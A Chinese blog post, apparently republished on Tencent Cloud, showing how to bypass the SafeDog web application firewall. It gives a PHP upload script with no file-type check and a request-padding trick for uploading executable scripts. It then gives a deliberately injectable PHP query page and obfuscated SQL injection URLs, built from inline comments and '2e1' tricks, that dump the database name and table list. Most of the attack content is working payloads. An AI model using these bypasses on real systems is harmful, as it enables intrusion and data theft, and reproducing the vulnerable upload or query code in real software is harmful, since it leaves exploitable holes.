前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >SQL注入 上传绕过安全狗

SQL注入 上传绕过安全狗

作者头像
奶糖味的代言
发布2018-04-16 11:07:04
1.6K0
发布2018-04-16 11:07:04
举报
文章被收录于专栏:小白安全小白安全

一,绕过安全狗上传可执行脚本 附上php上传脚本源码,此源码未对上传文件类型做校验 <?php         move_uploaded_file($_FILES["file"]["tmp_name"],"./" . $_FILES["file"]["name"]);         echo "Stored in: " . "./" . $_FILES["file"]["name"]; ?> <form action="" method="post" enctype="multipart/form-data"> <input type="file" name="file" id="file" />  <input type="submit" name="submit" value="Submit" /> </form>   ------------- 绕过方法,工具:burpsuite 1,用 php脚本或者js,python等其他语言,生成48930个字符 <?php  for ($i=0; $i <= 48930; $i++) {          echo 'o'; } ?> 2,抓包,改包   3,添加后如图:   4,查看当前目录,上传成功1 二,sql注入绕过安全狗 1,测试文件,明显的字符型 SQL注入 <?php         header("Content-type: text/html; charset=utf-8");         $link = mysql_connect("localhost","root","root");         mysql_select_db("test",$link);         $sql = "select * from cms where id='{$_GET['id']}'";         echo $sql;         echo '<br>-----------------------------<br>';         $res = mysql_query($sql);         while ( $rows = mysql_fetch_array($res)) {                 echo $rows[0];                 echo $rows[1];                 echo $rows[2];         } ?> 2,正常运行界面   3,添加注入测试语句 http://localhost/waf123.php?id=3' and 1=1 --+   4,修改测试语句 http://localhost/waf123.php?id=3'/*!and*/%202e1/**/=2e1--+   5,暴库 http://localhost/waf123.php?id=2e1'/*!and*/ 2e1/**/=2e1union(/*.1112*//**//*!*/(select@1/**/,2,database/**/(),4,5))--+    6,爆表 http://localhost/waf123.php?id=2e1'/*!and*/ 2e1/**/=2e1union(/*.1112*//**//*!*/(select@1/**/,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=0x74657374))--+   

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档